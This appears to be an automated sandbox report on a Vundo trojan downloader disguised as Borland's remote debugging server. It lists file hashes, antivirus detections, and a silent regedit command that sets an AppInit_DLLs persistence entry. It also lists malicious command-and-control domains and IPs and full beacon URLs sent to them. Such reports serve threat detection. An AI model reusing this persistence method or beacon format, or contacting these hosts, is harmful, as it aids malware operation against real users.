Analysis Date: 2013-09-06 16:41:04
MD5: f7edfe728b226acdf64318dd1c70c3f4
SHA1: aa558ff432799cdb8ba9814b7a251542d72a1a1d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 545a2b46c96b3e3e14886d53b96ca32f sha1: bee2f3078cdd9ca4e6b46e01553b5a1b447b66c4 size: 90112
Section: _ASM2 md5: db8970f0ed57bdb0a322cac001244ca4 sha1: 6617d0ae98408862e2dcbe6f1705551022be9e39 size: 62464
Section: .rdata md5: 5be8eeb9fca386416f85ea22499ceea0 sha1: 727790a1b349b756866dec182b860ae1ac42c56c size: 7680
Section: .data md5: cf966f56f557d08c9bec69f08a983bb5 sha1: c5f9c4be81f768cc045b2cd5dff6b5b8a2aabb0c size: 5120
Section: .tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section: .rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp: 2012-09-19 03:58:12
Version:
LegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
Packer: Microsoft Visual C++ ?.?
PEhash: 96d5eb0902d5e1a03adc8ac7b1a6d8be8e91e4b8
AV avira: TR/Vundo.Gen8
AV msse: TrojanDownloader:Win32/Vundo.J
AV avg: Generic29.BLEL

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray\Services ➝ 31
Creates File: C:\WINDOWS\system32\cofzsbn.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process
Winsock DNS: 91.233.89.106
Winsock DNS: clickbeta.ru
Winsock DNS: denadb.com
Winsock DNS: terrans.su
Winsock DNS: nsknock.com
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: denareclick.com
Winsock DNS: gleospond.com
Winsock DNS: fescheck.com
Winsock DNS: instrango.com
Winsock DNS: tegimode.com
Winsock DNS: netrovad.com
Winsock DNS: nshouse1.com
Winsock DNS: foradns.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ Pid 1964

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\cofzsbn.dll\\x00

Network Details:

DNS: gleospond.com
Type: A
91.220.35.154
DNS: getavodes.com
Type: A
91.220.35.154
DNS: tryatdns.com
Type: A
62.116.143.17
DNS: fescheck.com
Type: A
62.116.143.17
DNS: nsknock.com
Type: A
208.73.211.247
DNS: tegimode.com
Type: A
208.73.211.249
DNS: denadb.com
Type: A
208.73.211.246
DNS: foradns.com
Type: A
208.73.211.230
DNS: nshouse1.com
Type: A
208.73.211.246
DNS: instrango.com
Type: A
DNS: netrovad.com
Type: A
DNS: terrans.su
Type: A
DNS: clickstano.com
Type: A
DNS: denareclick.com
Type: A
DNS: clickbeta.ru
Type: A
DNS: clickclans.ru
Type: A
HTTP GET: http://gleospond.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn6yPs0PWYsnkF
User-Agent:
HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn6y8EM+h/SVnW
User-Agent:
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn64IlkP7LMvLW
User-Agent:
HTTP GET: http://fescheck.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn67d27jNH8aY8
User-Agent:
HTTP GET: http://nsknock.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn6xopua09ytnp
User-Agent:
HTTP GET: http://tegimode.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn664M+Ab/6ydt
User-Agent:
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn6xXd7l7ZM5Mh
User-Agent:
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn6/3Qp0+UDiah
User-Agent:
HTTP GET: http://nshouse1.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn65JTzQm7e/In
User-Agent:
HTTP GET: http://91.233.89.106/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1988&av=0&vm=0&al=0&p=497&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1Y9/rRB5jFPW7wYzIn6nw6bl6RLJxnn61BoISkTRKbb
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 91.220.35.154:80
Flows TCP: 192.168.1.1:1032 ➝ 91.220.35.154:80
Flows TCP: 192.168.1.1:1033 ➝ 62.116.143.17:80
Flows TCP: 192.168.1.1:1034 ➝ 62.116.143.17:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.211.247:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.211.249:80
Flows TCP: 192.168.1.1:1037 ➝ 208.73.211.246:80
Flows TCP: 192.168.1.1:1038 ➝ 208.73.211.230:80
Flows TCP: 192.168.1.1:1039 ➝ 208.73.211.246:80
Flows TCP: 192.168.1.1:1040 ➝ 91.233.89.106:80

Raw Pcap

Strings